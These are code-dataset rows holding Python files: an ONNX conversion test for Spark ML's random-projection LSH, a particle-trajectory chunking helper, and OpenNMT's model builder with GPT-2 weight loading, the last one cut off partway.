], ["id", "features"])
mh = BucketedRandomProjectionLSH(inputCol="features", outputCol="hashes", seed=12345, bucketLength=1.0)
model = mh.fit(data)
feature_count = data.first()[1].size
model_onnx = convert_sparkml(model, 'Sparkml BucketedRandomProjectionLSH', [
('features', FloatTensorType([None, feature_count]))
], spark_session=self.spark)
self.assertTrue(model_onnx is not None)
# run the model
predicted = model.transform(data)
data_np = data.toPandas().features.apply(
lambda x: pandas.Series(x.toArray())).values.astype(numpy.float32)
expected = [
predicted.toPandas().hashes.apply(lambda x: pandas.Series(x)
.map(lambda y: y.values[0])).values.astype(numpy.float32),
]
paths = save_data_models(data_np, expected, model, model_onnx,
basename="SparkmlBucketedRandomProjectionLSH")
onnx_model_path = paths[-1]
output, output_shapes = run_onnx_model(['hashes'], data_np, onnx_model_path)
compare_results(expected, output, decimal=5)
if __name__ == "__main__":
unittest.main()
| 40.962963
| 111
| 0.648282
|
import sys
import unittest
import pandas
import numpy
from pyspark.ml.feature import BucketedRandomProjectionLSH
from pyspark.ml.linalg import Vectors
from onnxmltools import convert_sparkml
from onnxmltools.convert.common.data_types import FloatTensorType
from tests.sparkml.sparkml_test_utils import save_data_models, run_onnx_model, compare_results
from tests.sparkml import SparkMlTestCase
class TestBucketedRandomProjectionLSH(SparkMlTestCase):
@unittest.skipIf(sys.platform == 'win32',
reason="UnsatisfiedLinkError")
@unittest.skipIf(sys.version_info < (3, 8),
reason="pickle fails on python 3.7")
def test_bucketed_random_projection_lsh(self):
data = self.spark.createDataFrame([
(0, Vectors.dense([-1.0, -1.0 ]),),
(1, Vectors.dense([-1.0, 1.0 ]),),
(2, Vectors.dense([1.0, -1.0 ]),),
(3, Vectors.dense([1.0, 1.0]),)
], ["id", "features"])
mh = BucketedRandomProjectionLSH(inputCol="features", outputCol="hashes", seed=12345, bucketLength=1.0)
model = mh.fit(data)
feature_count = data.first()[1].size
model_onnx = convert_sparkml(model, 'Sparkml BucketedRandomProjectionLSH', [
('features', FloatTensorType([None, feature_count]))
], spark_session=self.spark)
self.assertTrue(model_onnx is not None)
predicted = model.transform(data)
data_np = data.toPandas().features.apply(
lambda x: pandas.Series(x.toArray())).values.astype(numpy.float32)
expected = [
predicted.toPandas().hashes.apply(lambda x: pandas.Series(x)
.map(lambda y: y.values[0])).values.astype(numpy.float32),
]
paths = save_data_models(data_np, expected, model, model_onnx,
basename="SparkmlBucketedRandomProjectionLSH")
onnx_model_path = paths[-1]
output, output_shapes = run_onnx_model(['hashes'], data_np, onnx_model_path)
compare_results(expected, output, decimal=5)
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c4245ef50b820bbed08ca2fb090aa1c3a77795b
| 3,699
|
py
|
Python
|
python/lib/lib_care/utils/chunk_traj.py
|
timtyree/bgmc
|
891e003a9594be9e40c53822879421c2b8c44eed
|
[
"MIT"
] | null | null | null |
python/lib/lib_care/utils/chunk_traj.py
|
timtyree/bgmc
|
891e003a9594be9e40c53822879421c2b8c44eed
|
[
"MIT"
] | null | null | null |
python/lib/lib_care/utils/chunk_traj.py
|
timtyree/bgmc
|
891e003a9594be9e40c53822879421c2b8c44eed
|
[
"MIT"
] | null | null | null |
#compute_traj.py
from ..my_initialization import *
from . import *
def chunk_traj(df,pid_lst,width,height, DS, DT, jump_thresh=10., distance_L2_pbc=None, LT_thresh=1, **kwargs):
# d_lst = []
chunk_index=1
if distance_L2_pbc is None:
distance_L2_pbc = get_distance_L2_pbc(width=width,height=height)
for pid in pid_lst:
d_raw = df[df.particle==pid].copy()
#drop any rows before t=100ms
#drop any rows that already have a value in particle2
d_raw.reset_index(inplace=True)#,drop=True)
x_values, y_values, c_values = d_raw[['x','y', 't']].values.T
jump_index_array, spd_lst = find_jumps_non_pbc(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=None)#.25)
# jump_index_array_pbc, spd_lst = find_jumps(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=None)#.25)
# jump_index_array, spd_lst = find_jumps(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=jump_thresh)#.25)
# jump_index_array=sorted(set(jump_index_array).difference(set(jump_index_array_pbc)))
jarry=np.hstack([jump_index_array,-9999])
Nj = jarry.shape[0]
for j,ji in enumerate(jarry):
if ji==-9999:
if len(jump_index_array)==0:
#no jumps exist
d = d_raw
else:
#this is the final jump to the end
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:]#.copy()
elif j==0:
#this is the beginning up until the first jump
d = d_raw.iloc[:ji]#.copy()
else:#elif j<Nj:
#this is an intermediate jump
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:ji]#.copy()
# else:
# d = d_raw.iloc[ji:]#.copy()
# for ji in jump_index_array:
#record datum only for long trajectory segments? yes.
if d.t.count()>LT_thresh:
#reset the index back to that of df
# d = d.reindex(d['index'],copy=False).copy()
df.loc[d['index'].values,'cid']=chunk_index
chunk_index +=1
# d_lst.append(d)
return df
# def chunk_traj(df,pid_lst,width=200,height=200,jump_thresh=10., distance_L2_pbc=None, LT_thresh=1):
# d_lst = []
# if distance_L2_pbc is None:
# distance_L2_pbc = get_distance_L2_pbc(width=200,height=200)
# for pid in pid_lst:
# d_raw = df[df.particle==pid].copy()
# #drop any rows before t=100ms
# #drop any rows that already have a value in particle2
# d_raw.reset_index(inplace=True)#,drop=True)
# x_values ,y_values, c_values = d_raw[['x','y', 't']].values.T
#
# jump_index_array, spd_lst = find_jumps(x_values,y_values,distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=jump_thresh)#.25)
# jarry=np.hstack([0,jump_index_array])
# Nj = jarry.shape[0]
# for j,ji in enumerate(jarry):
# if j<Nj-1:
# ji_next=jarry[j+1]
# d = d_raw.iloc[ji:ji_next].copy()
# else:
# d = d_raw.iloc[ji:].copy()
# # for ji in jump_index_array:
# #record datum only for long trajectory segments? yes.
# if d.t.count()>LT_thresh:
# #reset the index back to that of df
# d = d.reindex(d['index'],copy=False).copy()
# d_lst.append(d)
# return d_lst
| 48.038961
| 168
| 0.583671
|
from ..my_initialization import *
from . import *
def chunk_traj(df,pid_lst,width,height, DS, DT, jump_thresh=10., distance_L2_pbc=None, LT_thresh=1, **kwargs):
chunk_index=1
if distance_L2_pbc is None:
distance_L2_pbc = get_distance_L2_pbc(width=width,height=height)
for pid in pid_lst:
d_raw = df[df.particle==pid].copy()
d_raw.reset_index(inplace=True)
x_values, y_values, c_values = d_raw[['x','y', 't']].values.T
jump_index_array, spd_lst = find_jumps_non_pbc(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=None)
jarry=np.hstack([jump_index_array,-9999])
Nj = jarry.shape[0]
for j,ji in enumerate(jarry):
if ji==-9999:
if len(jump_index_array)==0:
d = d_raw
else:
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:]
elif j==0:
d = d_raw.iloc[:ji]
else:
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:ji]
if d.t.count()>LT_thresh:
df.loc[d['index'].values,'cid']=chunk_index
chunk_index +=1
return df
| true
| true
|
1c42466f12034657d3309d69a4856592d9ec39cb
| 27,467
|
py
|
Python
|
onmt/model_builder.py
|
mataney/encoder-agnostic-adaptation
|
59d7c2d4fe69f794c7449f0459f00350fcfbbf70
|
[
"MIT"
] | 2
|
2020-01-18T02:07:25.000Z
|
2020-04-16T23:19:03.000Z
|
onmt/model_builder.py
|
mataney/encoder-agnostic-adaptation
|
59d7c2d4fe69f794c7449f0459f00350fcfbbf70
|
[
"MIT"
] | null | null | null |
onmt/model_builder.py
|
mataney/encoder-agnostic-adaptation
|
59d7c2d4fe69f794c7449f0459f00350fcfbbf70
|
[
"MIT"
] | 1
|
2020-01-22T04:01:42.000Z
|
2020-01-22T04:01:42.000Z
|
"""
This file is for models creation, which consults options
and creates each encoder and decoder accordingly.
"""
import re
import math
import copy
import torch
import torch.nn as nn
from torch.nn.init import xavier_uniform_
import onmt.inputters as inputters
import onmt.modules
from onmt.encoders import str2enc
from onmt.decoders import str2dec
from onmt.modules import Embeddings, CopyGenerator, SimpleFusionGenerator
from onmt.modules.util_class import Cast
from onmt.utils.misc import use_gpu
from onmt.utils.logging import logger
from onmt.utils.parse import ArgumentParser
def build_embeddings(opt, text_field, for_encoder=True):
"""
Args:
opt: the option in current environment.
text_field(TextMultiField): word and feats field.
for_encoder(bool): build Embeddings for encoder or decoder?
"""
emb_dim = opt.src_word_vec_size if for_encoder else opt.tgt_word_vec_size
pad_indices = [f.vocab.stoi[f.pad_token] for _, f in text_field]
word_padding_idx, feat_pad_indices = pad_indices[0], pad_indices[1:]
num_embs = [len(f.vocab) for _, f in text_field]
num_word_embeddings, num_feat_embeddings = num_embs[0], num_embs[1:]
fix_word_vecs = opt.fix_word_vecs_enc if for_encoder \
else opt.fix_word_vecs_dec
pos_enc_learned = opt.position_encoding_learned_enc if for_encoder else opt.position_encoding_learned_dec
GPT_representation_mode = opt.GPT_representation_mode if opt.GPT_representation_loc == 'both' or (opt.GPT_representation_loc == 'src' and for_encoder) or (opt.GPT_representation_loc == 'tgt' and not for_encoder) else 'none'
emb = Embeddings(
word_vec_size=emb_dim,
position_encoding=opt.position_encoding,
position_encoding_learned=pos_enc_learned,
position_encoding_ctxsize=opt.position_encoding_ctxsize,
feat_merge=opt.feat_merge,
feat_vec_exponent=opt.feat_vec_exponent,
feat_vec_size=opt.feat_vec_size,
dropout=opt.dropout,
word_padding_idx=word_padding_idx,
feat_padding_idx=feat_pad_indices,
word_vocab_size=num_word_embeddings,
feat_vocab_sizes=num_feat_embeddings,
sparse=opt.optim == "sparseadam",
fix_word_vecs=fix_word_vecs,
GPT_representation_mode=GPT_representation_mode,
GPT_representation_tgt=not for_encoder
)
return emb
def build_encoder(opt, embeddings):
"""
Various encoder dispatcher function.
Args:
opt: the option in current environment.
embeddings (Embeddings): vocab embeddings for this encoder.
"""
enc_type = opt.encoder_type if opt.model_type == "text" else opt.model_type
return str2enc[enc_type].from_opt(opt, embeddings)
def build_decoder(opt, embeddings):
"""
Various decoder dispatcher function.
Args:
opt: the option in current environment.
embeddings (Embeddings): vocab embeddings for this decoder.
"""
dec_type = "ifrnn" if opt.decoder_type == "rnn" and opt.input_feed \
else opt.decoder_type
return str2dec[dec_type].from_opt(opt, embeddings)
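# Note (illustrative, not from the original file): build_encoder and build_decoder only
# look up a class by its registered name and delegate construction to that class's
# from_opt() classmethod, e.g. (names as registered in OpenNMT-py's str2enc/str2dec tables):
#
#     enc = str2enc["transformer"].from_opt(opt, src_emb)   # -> TransformerEncoder
#     dec = str2dec["transformer"].from_opt(opt, tgt_emb)   # -> TransformerDecoder
#
# so supporting a new architecture only requires registering it in those tables.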
def load_test_model(opt, model_path=None):
if model_path is None:
model_path = opt.models[0]
checkpoint = torch.load(model_path,
map_location=lambda storage, loc: storage)
model_opt = ArgumentParser.ckpt_model_opts(checkpoint['opt'])
ArgumentParser.update_model_opts(model_opt)
ArgumentParser.validate_model_opts(model_opt)
vocab = checkpoint['vocab']
if inputters.old_style_vocab(vocab):
fields = inputters.load_old_vocab(
vocab, opt.data_type, dynamic_dict=model_opt.copy_attn
)
else:
fields = vocab
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint,
opt.gpu)
if opt.fp32:
model.float()
model.eval()
model.generator.eval()
return fields, model, model_opt
class PadGen(nn.Module):
def __init__(self):
super(PadGen, self).__init__()
def forward(self, vals):
# Need to make this more general
vals[..., 50257:] = -1e10
return vals
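# Illustrative sketch (hypothetical tensors, not from the original file): PadGen masks the
# logit slots that exist only because the GPT-2 vocabulary (50257 tokens) was padded up to
# a multiple of 8, so the LogSoftmax applied after it gives them effectively zero probability:
#
#     logits = torch.zeros(2, 50264)               # padded vocab size of 50264
#     masked = PadGen()(logits.clone())
#     assert (masked[..., 50257:] == -1e10).all()  # padded slots suppressed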
def build_base_model(model_opt, fields, gpu, checkpoint=None, gpu_id=None):
"""Build a model from opts.
Args:
model_opt: the option loaded from checkpoint. It's important that
the opts have been updated and validated. See
:class:`onmt.utils.parse.ArgumentParser`.
fields (dict[str, torchtext.data.Field]):
`Field` objects for the model.
gpu (bool): whether to use gpu.
        checkpoint: the model generated by the train phase, or a resumed snapshot
model from a stopped training.
gpu_id (int or NoneType): Which GPU to use.
Returns:
the NMTModel.
"""
# Build embeddings.
if model_opt.model_type == "text":
src_field = fields["src"]
src_emb = build_embeddings(model_opt, src_field)
else:
src_emb = None
# Build encoder.
encoder = build_encoder(model_opt, src_emb)
# Build decoder.
tgt_field = fields["tgt"]
tgt_emb = build_embeddings(model_opt, tgt_field, for_encoder=False)
# Share the embedding matrix - preprocess with share_vocab required.
if model_opt.share_embeddings:
# src/tgt vocab should be the same if `-share_vocab` is specified.
assert src_field.base_field.vocab == tgt_field.base_field.vocab, \
"preprocess with -share_vocab if you use share_embeddings"
tgt_emb.word_lut.weight = src_emb.word_lut.weight
if model_opt.share_position_embeddings:
tgt_emb.make_embedding.pe.pe.weight = src_emb.make_embedding.pe.pe.weight
decoder = build_decoder(model_opt, tgt_emb)
# Build NMTModel(= encoder + decoder).
if gpu and gpu_id is not None:
device = torch.device("cuda", gpu_id)
elif gpu and not gpu_id:
device = torch.device("cuda")
elif not gpu:
device = torch.device("cpu")
# Build separate LM if doing simple fusion
if model_opt.simple_fusion:
layers = 12
size = 768
heads = 12
lm_decoder_opt = copy.deepcopy(model_opt)
lm_decoder_opt.dec_layers = layers
lm_decoder_opt.use_GPT_version_ctxattn = False
lm_decoder_opt.use_GPT_version_psa = False
lm_decoder_opt.use_GPT_version_unconditional = True
lm_decoder_opt.tgt_word_vec_size = size
lm_decoder_opt.rnn_size = size
lm_decoder_opt.dec_rnn_size = size
lm_decoder_opt.transformer_ff = size*4
lm_decoder_opt.dec_heads = heads
lm_decoder_opt.position_encoding_learned_dec = True
lm_decoder_opt.share_decoder_embeddings = True
lm_decoder_opt.dropout = 0
lm_decoder_emb = build_embeddings(lm_decoder_opt, tgt_field, for_encoder=False)
logger.info(lm_decoder_emb)
lm_decoder = build_decoder(lm_decoder_opt, lm_decoder_emb)
load_decoder = lm_decoder
model = onmt.models.SimpleFusionModel(encoder, decoder, lm_decoder)
generator = SimpleFusionGenerator(model_opt.dec_rnn_size,
lm_decoder_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab))
generator.lm_linear.weight = lm_decoder.embeddings.word_lut.weight
if model_opt.share_decoder_embeddings:
generator.decoder_linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.lm_linear
else:
load_decoder = decoder
if model_opt.unconditional:
model = onmt.models.UncondModel(decoder)
elif model_opt.num_src > 1:
from argparse import Namespace
agenda_field = fields["agenda"]
agenda_opt = Namespace(**model_opt.__dict__)
for k in agenda_opt.__dict__.keys():
if hasattr(model_opt, f"agenda_{k}"):
setattr(agenda_opt, k, getattr(model_opt, f"agenda_{k}"))
agenda_emb = build_embeddings(agenda_opt, agenda_field)
agenda_encoder = build_encoder(model_opt, agenda_emb)
encoders = nn.ModuleList([encoder, agenda_encoder])
model = onmt.neural_checklist.MultiSrcNMTModel(encoders, decoder)
else:
model = onmt.models.NMTModel(encoder, decoder)
# Build Generator.
if not model_opt.copy_attn:
if model_opt.generator_function == "sparsemax":
gen_func = onmt.modules.sparse_activations.LogSparsemax(dim=-1)
else:
gen_func = nn.LogSoftmax(dim=-1)
if model_opt.padded_vocab_fix_me_later:
gen_func = nn.Sequential(PadGen(), gen_func)
generator = nn.Sequential(
nn.Linear(model_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab)),
Cast(torch.float32),
gen_func
)
if model_opt.share_decoder_embeddings:
generator[0].weight = decoder.embeddings.word_lut.weight
gen_linear = generator[0]
else:
tgt_base_field = fields["tgt"].base_field
vocab_size = len(tgt_base_field.vocab)
pad_idx = tgt_base_field.vocab.stoi[tgt_base_field.pad_token]
generator = CopyGenerator(model_opt.dec_rnn_size, vocab_size, pad_idx)
if model_opt.share_decoder_embeddings:
generator.linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.linear
if model_opt.encdec_share_params:
for name, p in decoder.named_parameters():
if 'ctx' in name or 'context' in name:
continue
pointer = encoder
attrs = name.split('.')
for attr_name in attrs[:-1]:
pointer = getattr(pointer, attr_name)
# pointer now has the encoder version of the parameter parent
setattr(pointer, attrs[-1], p)
# Load the model states from checkpoint or initialize them.
if checkpoint is not None:
# Normally, just load the model parameters from checkpoint
if 'gpt2_params' not in checkpoint and 'enc_model' not in checkpoint:
            # This preserves backward compatibility for models using custom layernorm
def fix_key(s):
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.b_2',
r'\1.layer_norm\2.bias', s)
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.a_2',
r'\1.layer_norm\2.weight', s)
return s
checkpoint['model'] = {fix_key(k): v
for k, v in checkpoint['model'].items()}
# end of patch for backward compatibility
# Initialize rest of parameters normally
if hasattr(model_opt, 'load_uncond_from') and model_opt.load_uncond_from:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
# Always initialize encoder parameters normally
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
model.load_state_dict(checkpoint['model'], strict=False)
generator.load_state_dict(checkpoint['generator'], strict=False)
else:
# load the gpt parameters
if 'gpt2_params' in checkpoint:
init_something = model_opt.gpt2_init_embanddec or model_opt.simple_fusion or model_opt.gpt2_init_embandenc or model_opt.GPT_representation_mode != 'none'
if init_something:
# Initialize all the weights first
if model_opt.gpt2_init_zero:
for p in decoder.parameters():
p.data.zero_()
if model_opt.simple_fusion:
generator.decoder_linear.weight.data.zero_()
generator.decoder_linear.bias.data.zero_()
else:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
# Always initialize encoder parameters normally
if encoder is not None:
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.zero_bias_init:
gen_linear.bias.data.zero_()
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
gen_linear.bias.data.zero_()
load_models = []
if model_opt.GPT_representation_mode != 'none':
load_embs = []
if model_opt.GPT_representation_loc in ['both', 'src']:
load_models.append(src_emb.gpt_model)
load_embs.append(src_emb)
if model_opt.GPT_representation_loc in ['both', 'tgt']:
load_models.append(tgt_emb.gpt_model)
load_embs.append(tgt_emb)
else:
if model_opt.gpt2_init_embanddec or model_opt.simple_fusion:
load_models = [load_decoder]
elif model_opt.gpt2_init_embandenc:
load_models = [encoder]
it_list = list(checkpoint['gpt2_params'])
for lm_idx, load_model in enumerate(load_models):
#print(lm_idx, load_model)
for name, array in it_list:
name = name[6:] # skip "model/"
name = name.split('/')
assigned = False
if name[0] == 'wpe':
if model_opt.GPT_representation_mode != 'none':
pointer = load_embs[lm_idx].make_embedding.pe.pe.weight
else:
pointer = load_model.embeddings.make_embedding.pe.pe.weight
elif name[0] == 'wte':
if model_opt.GPT_representation_mode != 'none':
pointer = [load_embs[lm_idx].make_embedding.emb_luts[0].weight, gen_linear.weight]
else:
pointer = [load_model.embeddings.make_embedding.emb_luts[0].weight]
if not model_opt.nopretrain_decemb:
pointer.append(gen_linear.weight)
if model_opt.simple_fusion and model_opt.sf_pretrain_dec_emb:
pointer.append(decoder.embeddings.make_embedding.emb_luts[0].weight)
elif name[0] == 'ln_f':
if name[1] == 'g':
pointer = load_model.layer_norm.weight
elif name[1] == 'b':
pointer = load_model.layer_norm.bias
else:
raise ValueError('I am missing something here!')
elif name[0][0] == 'h':
layer_num = name[0][1:]
pointer = getattr(load_model.transformer_layers, layer_num)
if name[1] == 'attn':
assigned = True
pointer = pointer.self_attn
full_data = torch.from_numpy(array)
if name[2] == 'c_attn':
end_size = full_data.shape[-1]//3
assert full_data.shape[-1] % 3 == 0
if name[3] == 'b':
if init_something:
pointer.linear_query.bias.data = full_data[:end_size]
pointer.linear_keys.bias.data = full_data[end_size:end_size*2]
pointer.linear_values.bias.data = full_data[end_size*2:]
if model_opt.gpt2_params_std > 0:
pointer.linear_query.bias.orig = full_data[:end_size].clone()
pointer.linear_keys.bias.orig = full_data[end_size:end_size*2].clone()
pointer.linear_values.bias.orig = full_data[end_size*2:].clone()
elif name[3] == 'w':
if init_something:
pointer.linear_query.weight.data = full_data[:, :end_size].t().contiguous()
pointer.linear_keys.weight.data = full_data[:, end_size:end_size*2].t().contiguous()
pointer.linear_values.weight.data = full_data[:, end_size*2:].t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.linear_query.weight.orig = full_data[:, :end_size].t().contiguous().clone()
pointer.linear_keys.weight.orig = full_data[:, end_size:end_size*2].t().contiguous().clone()
pointer.linear_values.weight.orig = full_data[:, end_size*2:].t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[2] == 'c_proj':
if name[3] == 'b':
if init_something:
pointer.final_linear.bias.data = full_data
if model_opt.gpt2_params_std > 0:
pointer.final_linear.bias.orig = full_data.clone()
elif name[3] == 'w':
if init_something:
pointer.final_linear.weight.data = full_data.t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.final_linear.weight.orig = full_data.t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[1] == 'ln_1' or name[1] == 'ln_2':
num = name[1][3]
pointer = getattr(pointer, 'layer_norm_'+num)
if name[2] == 'b':
pointer = pointer.bias
elif name[2] == 'g':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
elif name[1] == 'mlp':
pointer = pointer.feed_forward
pointer = getattr(pointer, name[2])
if name[3] == 'b':
pointer = pointer.bias
elif name[3] == 'w':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
if not assigned:
if name[-1] == 'w' or name[-1] == 'g':
array = array.T
if not isinstance(pointer, list):
pointer = [pointer]
for pointer_i in pointer:
target_size = int(math.ceil(array.shape[0]/8))*8
padded_vocab = name[0] == 'wte' and pointer_i.shape[0] == target_size
padded_vocab = padded_vocab and pointer_i.shape[1:] == array.shape[1:]
try:
assert pointer_i.shape == array.shape or padded_vocab
except AssertionError as e:
e.args += (pointer_i.shape, array.shape)
raise
if init_something:
print("Initialize PyTorch weight {}".format(name))
if padded_vocab:
pointer_i.data[:array.shape[0]] = torch.from_numpy(array)
else:
pointer_i.data = torch.from_numpy(array)
if model_opt.gpt2_params_std > 0:
if padded_vocab:
raise NotImplementedError
else:
pointer_i.orig = torch.from_numpy(array).clone()
if 'enc_model' in checkpoint:
load_dict = {k[8:]: v for k, v in checkpoint['enc_model'] if 'encoder' in k}
encoder.load_state_dict(load_dict, strict=True)
else:
if model_opt.param_init != 0.0:
for p in model.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
for p in generator.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
if model_opt.param_init_glorot:
for p in model.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if not model_opt.unconditional and hasattr(model.encoder, 'embeddings') \
and model.encoder.embeddings is not None:
model.encoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_enc)
if hasattr(model.decoder, 'embeddings'):
model.decoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_dec)
# remove requires_grad from params that are not trained:
if model_opt.notrain_emb or model_opt.notrain_embanddec:
if model_opt.position_encoding_learned_enc and model_opt.share_position_embeddings:
model.encoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
if model_opt.share_embeddings:
model.encoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
model.decoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
model.decoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
generator[0].weight.requires_grad = False
if model_opt.notrain_genbias:
generator[0].bias.requires_grad = False
if model_opt.notrain_embanddec:
for name, p in load_decoder.layer_norm.named_parameters():
p.requires_grad = False
for name, p in load_decoder.transformer_layers.named_parameters():
if 'context' not in name and 'ctx' not in name: # Takes care of normal and psa versions
p.requires_grad = False
if model_opt.onlytrainln:
for name, p in model.decoder.named_parameters():
if 'layer_norm' not in name:
p.requires_grad = False
for p in generator.parameters():
p.requires_grad = False
if model_opt.onlytrainoutp:
if model_opt.share_decoder_embeddings:
raise ValueError
for p in model.decoder.parameters():
p.requires_grad = False
if model_opt.simple_fusion:
for p in lm_decoder.parameters():
p.requires_grad = False
for p in generator.lm_linear.parameters():
p.requires_grad = False
model.generator = generator
model.to(device)
if model_opt.model_dtype == 'fp16':
model.half()
for p in model.parameters():
if hasattr(p, 'orig'):
p.orig = p.orig.to(device)
if model_opt.model_dtype == 'fp16':
p.orig = p.orig.half()
return model
def linear_repr_patch(self):
return 'in_features={}, out_features={}, bias={}, wgrad={}, bgrad={}'.format(
self.in_features, self.out_features, self.bias is not None,
self.weight.requires_grad, self.bias.requires_grad if self.bias is not None else 'N/A'
)
def ln_repr_patch(self):
string = '{normalized_shape}, eps={eps}, ' \
'elementwise_affine={elementwise_affine}'.format(**self.__dict__)
string += ', wgrad={}, bgrad={}'.format(self.weight.requires_grad if self.weight is not None else 'N/A',
self.bias.requires_grad if self.bias is not None else 'N/A')
return string
def emb_repr_patch(self):
s = '{num_embeddings}, {embedding_dim}'
if self.padding_idx is not None:
s += ', padding_idx={padding_idx}'
if self.max_norm is not None:
s += ', max_norm={max_norm}'
if self.norm_type != 2:
s += ', norm_type={norm_type}'
if self.scale_grad_by_freq is not False:
s += ', scale_grad_by_freq={scale_grad_by_freq}'
if self.sparse is not False:
s += ', sparse=True'
s = s.format(**self.__dict__)
s += ', grad={}'.format(self.weight.requires_grad)
return s
def build_model(model_opt, opt, fields, checkpoint):
logger.info('Building model...')
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint)
# Show which params will be updated
nn.Linear.extra_repr = linear_repr_patch
nn.LayerNorm.extra_repr = ln_repr_patch
nn.Embedding.extra_repr = emb_repr_patch
logger.info(model)
return model
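# Illustrative usage sketch (variable names are assumptions, mirroring how OpenNMT-py's
# training entry point calls this module):
#
#     model_opt = ArgumentParser.ckpt_model_opts(checkpoint['opt']) if checkpoint else opt
#     model = build_model(model_opt, opt, fields, checkpoint)
#     # with the extra_repr patches above, logger.info(model) also reports which
#     # Linear/LayerNorm/Embedding weights still have requires_grad=True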
| 44.807504
| 227
| 0.545891
|
import re
import math
import copy
import torch
import torch.nn as nn
from torch.nn.init import xavier_uniform_
import onmt.inputters as inputters
import onmt.modules
from onmt.encoders import str2enc
from onmt.decoders import str2dec
from onmt.modules import Embeddings, CopyGenerator, SimpleFusionGenerator
from onmt.modules.util_class import Cast
from onmt.utils.misc import use_gpu
from onmt.utils.logging import logger
from onmt.utils.parse import ArgumentParser
def build_embeddings(opt, text_field, for_encoder=True):
emb_dim = opt.src_word_vec_size if for_encoder else opt.tgt_word_vec_size
pad_indices = [f.vocab.stoi[f.pad_token] for _, f in text_field]
word_padding_idx, feat_pad_indices = pad_indices[0], pad_indices[1:]
num_embs = [len(f.vocab) for _, f in text_field]
num_word_embeddings, num_feat_embeddings = num_embs[0], num_embs[1:]
fix_word_vecs = opt.fix_word_vecs_enc if for_encoder \
else opt.fix_word_vecs_dec
pos_enc_learned = opt.position_encoding_learned_enc if for_encoder else opt.position_encoding_learned_dec
GPT_representation_mode = opt.GPT_representation_mode if opt.GPT_representation_loc == 'both' or (opt.GPT_representation_loc == 'src' and for_encoder) or (opt.GPT_representation_loc == 'tgt' and not for_encoder) else 'none'
emb = Embeddings(
word_vec_size=emb_dim,
position_encoding=opt.position_encoding,
position_encoding_learned=pos_enc_learned,
position_encoding_ctxsize=opt.position_encoding_ctxsize,
feat_merge=opt.feat_merge,
feat_vec_exponent=opt.feat_vec_exponent,
feat_vec_size=opt.feat_vec_size,
dropout=opt.dropout,
word_padding_idx=word_padding_idx,
feat_padding_idx=feat_pad_indices,
word_vocab_size=num_word_embeddings,
feat_vocab_sizes=num_feat_embeddings,
sparse=opt.optim == "sparseadam",
fix_word_vecs=fix_word_vecs,
GPT_representation_mode=GPT_representation_mode,
GPT_representation_tgt=not for_encoder
)
return emb
def build_encoder(opt, embeddings):
enc_type = opt.encoder_type if opt.model_type == "text" else opt.model_type
return str2enc[enc_type].from_opt(opt, embeddings)
def build_decoder(opt, embeddings):
dec_type = "ifrnn" if opt.decoder_type == "rnn" and opt.input_feed \
else opt.decoder_type
return str2dec[dec_type].from_opt(opt, embeddings)
def load_test_model(opt, model_path=None):
if model_path is None:
model_path = opt.models[0]
checkpoint = torch.load(model_path,
map_location=lambda storage, loc: storage)
model_opt = ArgumentParser.ckpt_model_opts(checkpoint['opt'])
ArgumentParser.update_model_opts(model_opt)
ArgumentParser.validate_model_opts(model_opt)
vocab = checkpoint['vocab']
if inputters.old_style_vocab(vocab):
fields = inputters.load_old_vocab(
vocab, opt.data_type, dynamic_dict=model_opt.copy_attn
)
else:
fields = vocab
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint,
opt.gpu)
if opt.fp32:
model.float()
model.eval()
model.generator.eval()
return fields, model, model_opt
class PadGen(nn.Module):
def __init__(self):
super(PadGen, self).__init__()
def forward(self, vals):
vals[..., 50257:] = -1e10
return vals
def build_base_model(model_opt, fields, gpu, checkpoint=None, gpu_id=None):
